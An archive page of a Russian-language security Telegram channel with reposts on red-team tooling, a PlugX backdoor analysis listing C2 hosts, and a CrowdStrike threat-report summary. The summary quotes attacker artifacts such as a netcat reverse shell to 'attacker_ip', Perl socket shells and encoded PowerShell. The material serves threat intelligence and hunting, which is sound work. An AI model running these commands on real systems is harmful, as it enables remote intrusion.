ar
Feedback
Fsecurity | HH

Fsecurity | HH

الذهاب إلى القناة على Telegram
2 018
المشتركون
-224 ساعات
+17 أيام
-1430 أيام
أرشيف المشاركات
Repost from Proxy Bar
Linux-persistence * zero pepsi ждем сок добрый сплоит пак и наступательный чебурек
Linux-persistence * zero pepsi ждем сок добрый сплоит пак и наступательный чебурек

Repost from RedTeam brazzers
Друзья, всем привет! В моей голове давно была хотелка создать некоторую документацию по Impacket. Быть может, даже цикл стате
Друзья, всем привет! В моей голове давно была хотелка создать некоторую документацию по Impacket. Быть может, даже цикл статей, который бы достаточно понятным языком, с обилием примеров, описывал механизмы работы этого замечательного инструмента. И у меня наконец-то дошли руки этим заняться! Я выкладываю первую часть из цикла статей про Impacket. В ней мы разберемся с основами RPC, изучим парочку базовых терминов, а также напишем собственный RPC клиент и сервер. https://cicada-8.medium.com/impacket-developer-guide-part-1-rpc-4df4fe6d79d7 А цикл статей завершится инструментом (а может даже несколькими) для бокового перемещения : ) RTB

Repost from SHADOW:Group
James Kettle дропнул свой ресерч про новые классы атак через HTTP Request Smuggling и, к моему большому респекту, подкрепил в
James Kettle дропнул свой ресерч про новые классы атак через HTTP Request Smuggling и, к моему большому респекту, подкрепил все это доступной лабой на Portswigger. Публичного решения нет, но лаба довольно простая. Теперь можно убивать HTTP/1.1 на реальных целях.

Repost from 🕷 BugBountyRu
🕷 Повышение эффективности разведки с помощью reverse DNS В разведке все методы хороши, особенно когда речь идет о больших ск
🕷 Повышение эффективности разведки с помощью reverse DNS В разведке все методы хороши, особенно когда речь идет о больших скоупах. Reverse DNS и анализ SSL-сертификатов — тот самый необходимый минимум. 😵 На помощь приходят как онлайн-сервисы, так и опенсорсные инструменты: ⚙️ hakip2host — принимает список IP-адресов через stdin, а затем выполняет ряд проверок и возвращает соответствующие доменные имена. ▪️Поиск PTR-записей в DNS ▪️Subject Alternative Names (SANs) в SSL-сертификатах ▪️Common Names (CNs) в SSL-сертификатах ⚙️ dnsx — быстрый и многофункциональный тулчейн от ProjectDiscovery для работы с DNS.
$ echo 173.0.84.0/24 | dnsx -silent -resp-only -ptr

Repost from BEAR-C2
Симуляция атаки группы APT Stardust Chollima Это симуляция атаки группы APT Stardust Chollima, нацеленной на межбанковскую сеть Чили. Кампания атаки была активна в декабре 2018 года и использовала PowerRatankba — вариант вредоносного ПО на базе PowerShell, который во многом схож с оригинальным имплантом Ratankba. Корпоративная сеть Redbanc была заражена версией PowerRatankba, которая не определялась антивирусным программным обеспечением. По данным компании Flashpoint, злоумышленники доставили вредоносное ПО следующим образом: доверенный IT-специалист Redbanc кликнул по ссылке для подачи заявки на вакансию, найденную в социальной сети LinkedIn. Репозиторий на GitHub: https://github.com/S3N4T0R-0X0/APT-Attack-Simulation/tree/main/North%20Koreans%20APT%2FStardust%20Chollima

The Threat Hunter's Cookbook🔥 🍳 Что внутри Cookbook: 🐱 Готовые SPL-запросы — бери как есть или настраивай под себя 🛠 Методологии и стратегии охоты: от выбора техники до построения гипотез 🧰 Рекомендованные приложения, ресурсы и утилиты для прокачки SecOps 🎯 Идеально подойдёт тем, кто уже: • использует Splunk в охоте • хочет формализовать поиск по PEAK • ищет примеры, которые не теоретические, а боевые 🔗 https://www.splunk.com/en_us/form/threat-hunters-cookbook.html 🦔 THF

Repost from ESCalator
Operation Tartaria Part 2 Помимо пассивного бэкдора PlugX, нам удалось обнаружить еще одну его версию, которая мимикрировала
+2
Operation Tartaria Part 2 Помимо пассивного бэкдора PlugX, нам удалось обнаружить еще одну его версию, которая мимикрировала под запуск Яндекс Браузера.
{"TaskId":"[REDACTED]","TaskName":"Yandexstart_Server","TaskRegistryPath":"\\Yandexstart_Server","TaskAuthor":"[REDACTED]","IsHiddenTask":false,"IsMissingOnFS":true,"Action":{"Context":"Author","Properties":[{"Id":"","ActionName":"Execution","Arguments":"-d restart","Command":"C:\\PROGRA~1\\Yandex\\browser\\Yandex.exe","WorkingDirectory":"","Flags":0}],"Version":3},"Triggers":[{"TriggerType":"Boot","Comment":"Boot"}],"CreatedTime":"2024-12-11T01:11:34Z","LastRunTime":"2025-06-23T06:37:17Z","LastErrorCode":1223,"Timeline":"2024-12-11T01:11:34Z"}
Yandex.exe оказался уязвимым для техники DLL Side-Loading, выполняемой утилитой Umdh.exe (User-Mode Dump Heap), которая подгружает вредоносную библиотеку dbghelp.dll под пакером VMProtect с кастомным названием секций; нагрузка хранится в файле desktop.ini. 🫣 Как и в предыдущем случае, мы имеем дело с двухмодульным бэкдором. Коннектор внедряется в процесс choice.exe, а интерпретатор команд — в mspaint.exe. Процессы общаются через pipe .\\PIPE\\[%d]. При успешном старте исследуемый образец подключается к блогу на livejournal.com (скриншот 1) и на ok.ru (скриншоты 2-3). Далее парсит содержимое ответа и ищет последовательность, которая начинается с R241223 и заканчивается на R251223 и внутри которой находится зашифрованный токен для API Yandex Cloud. Далее коммуникация бэкдора происходит через API. Аналогичный образец был описан в «CloudSorcerer: новая APT-угроза, нацеленная на российские государственные организации». Помимо Yandex Cloud, бэкдор поддерживает возможность общения через Microsoft Graph и Dropbox:
cloud-api.yandex.net
graph.microsoft.com
content.dropboxapi.com
Общение происходит посредством чтения и перезаписи файлов в заданной папке в облаке. Сами файлы защищены шифром простой замены, а структура сообщений отличается в зависимости от выполняемой команды. Однако везде используется один и тот же header:
0         2          6             10             14
| command | msg size | short answer | ticketcount |
☝️ Примечательны следующие функции бэкдора: возможность получать шеллкоды и PE-файлы, внедряя их в процессы TSTheme.exe и msiexec.exe; выполнение WMI-запросов для получения информации о системе:
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_TimeZone
SELECT * FROM Win32_ComputerSystem
SELECT * FROM Win32_QuickFixEngineering
отключение всех сетевых соединений API WNetCancelConnection2W; изменение параметров входа в учетную запись или пароля через API NetUserSetInfo. C2:
devtunnels.ms
https://anddes.livejournal.com/511.html
https://ok.ru/profile/587950172233/statuses/157023463517001
✅ Рекомендации: запрет DevTunnels с помощью групповой политики; поиск скрытых задач; поиск задач с параметром:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks" /s | findstr "2D00720065006D006F0074006500200075007000"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks" /s | findstr "2d00640020007200650073007400610072007400"
поиск идентификатора PlugX:
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\cf
Happy hunting! @ptescalator #dfir #ti #apt #reverse #malware

🔗Ссылка: https://opennet.ru/63693/

Repost from Social Engineering
🔄 Chrome Exploitation. • Недавно в блоге Operation Zero (компания которая покупает уязвимости в различном ПО\устройствах) бы
🔄 Chrome Exploitation. Недавно в блоге Operation Zero (компания которая покупает уязвимости в различном ПО\устройствах) была опубликована хорошая статья, которая описывает архитектуру современных браузеров и их эксплуатации на примере Chrome. Вы сможете изучить, как устроены подсистемы браузера, как обеспечивается их безопасность и как она нарушается с помощью уязвимостей, примитивов, обходов защит, эксплоитов и их цепочек. Каждая статья будет практической, поэтому с самого начала авторы кратко анализируют несколько известных эксплоитов, компилируют их благодаря публичному репозиторию и пробивают Chrome 130-й версии для Windows. Учитывайте, что на данный момент опубликована только первая часть на английском языке. Позже будет опубликовано продолжение, так что следите за блогом. Ну и еще обещают перевод на русский язык, но это не точно. ➡ https://opzero.ru/press/101-chrome-exploitation-part-0-preface S.E. ▪️ infosec.work ▪️ VT

🫥 CrowdStrike 2025 Threat Hunting Report 👾 За год OverWatch обработали 215,000+ интерактивных сессий, в которых не сработали ни сигнатуры, ни ML. Только люди + охота. Все атаки — hands-on-keyboard. Что подметить из репорта: 🔀 Cross-Domain / Cloud: когда атакуют сразу всё 🕷️ BLOCKADE SPIDER: • Начал с уязвимого VPN → DCSync → lateral через WinRM / PsExec • Переходил с endpoint на cloud: bypass MFA, создание rogue IAM agent • Пробивал Entra ID: добавление в “IAM No MFA”, обход геофильтров • На unmanaged системах ставил Chisel proxy и устраивал SOCKS-туннели 📌 Зафиксированы попытки помешать Falcon Sensor 🐼 OPERATOR PANDA (Salt Typhoon): • Эксплуатация Cisco IOS/IOS XE (CVE-2023-20198 + CVE-2023-20273) • Создание локального пользователя → log sanitization → RCE • Удар по blind-spot: роутеры, VPN, свитчи, вне зоны действия EDR ☁️ Cloud: GENESIS vs MURKY PANDA 🐼 GENESIS PANDA: • Pivot из Jenkins в облако через IMDS → добавление SSH-ключей и access key • Использование CSP CLI и команд: curl http://IP/latest/meta-data/ aws s3 ls gcloud compute ssh ... • Жил в control plane, хостил payload на облачных инстансах • Использовал .NET тул для возвращения в консоль по backdoor key 🐼 MURKY PANDA: • Атака через trusted relationship → backdoor в Entra ID сервисные учётки • Компрометация стороннего Azure-провайдера → логины с NAS/VPS • Отмечена малварь CloudedHope, удаление логов и резкая OPSEC-дисциплина 🔐 Identity: SCATTERED SPIDER и MFA reset через helpdesk 📞 Социнженерия по телефону (vishing): • MFA reset → SSO логин → SharePoint → PAM → dump ntds.dit • Отслежено, как они: меняют IP на резидентские (NSOCKS) ищут "reset password" шаблоны работают ночью, чтобы не быть замеченными SaaS + Identity + Endpoint = полный доступ без вирусов. 🔍 Поиск по: DeviceLogonEvents | where AccountName endswith "@domain.com" | where Timestamp during non-business-hours | where LogonType == "RemoteInteractive" ⌨️ Endpoint: тихие APT и живые бэкдоры 🐼 GLACIAL PANDA: • Угроза телеком-сектора на Linux, скрытая и долгая • Эксплуатация CVE-2016-5195 (Dirty COW) + CVE-2021-4034 (PwnKit) • ShieldSlide: троянизированный OpenSSH (/usr/sbin/sshd) с логами auth + backdoor-пароль • Примеры артефактов: /usr/sbin/cron → изменённый daemon perl -e 'use Socket; ...' → reverse shell netcat -e /bin/bash attacker_ip • LOTL-движение, атаки между дочками компаний 🔍 Охота через: sha256sum /usr/sbin/sshd | grep -v known_good ps aux | grep cron | grep -v /usr/sbin/cron 🕳 Vulnerability Hunting: 🕷 GRACEFUL SPIDER: • Zero-Day в Cleo MFT (CVE-2024-55956) → bypass старого фикса CVE-2024-50623 • Этапы: Загрузка .zipC:\VLTrader\temp\ В распаковке XML с параметром выполнения команды Внедрение shellcode → запуск пиратского Cobalt Strike • Использовал: <Mailbox type="system" command="powershell -enc ..." /> Falcon Sensor + OverWatch охота по: #event_simpleName=PeFileWritten ContextBaseFileName=java.exe TargetFileName!=/<known_good_files>/ ⚔️ Threat hunting требует выхода за границы одного домена. Только корреляция данных Identity + Cloud + Endpoint + Exposure позволяет отследить такие группировки, как BLOCKADE, OPERATOR, SCATTERED и PANDA-акторов. ☁️ Cloud = новая активная зона APT 🧬 Identity = entry + escalation 💣 Endpoint = persistence + эксфиль 🐱 SIEM и XDR = must have, чтобы не видеть только “что”, но и “почему” 🦔 THF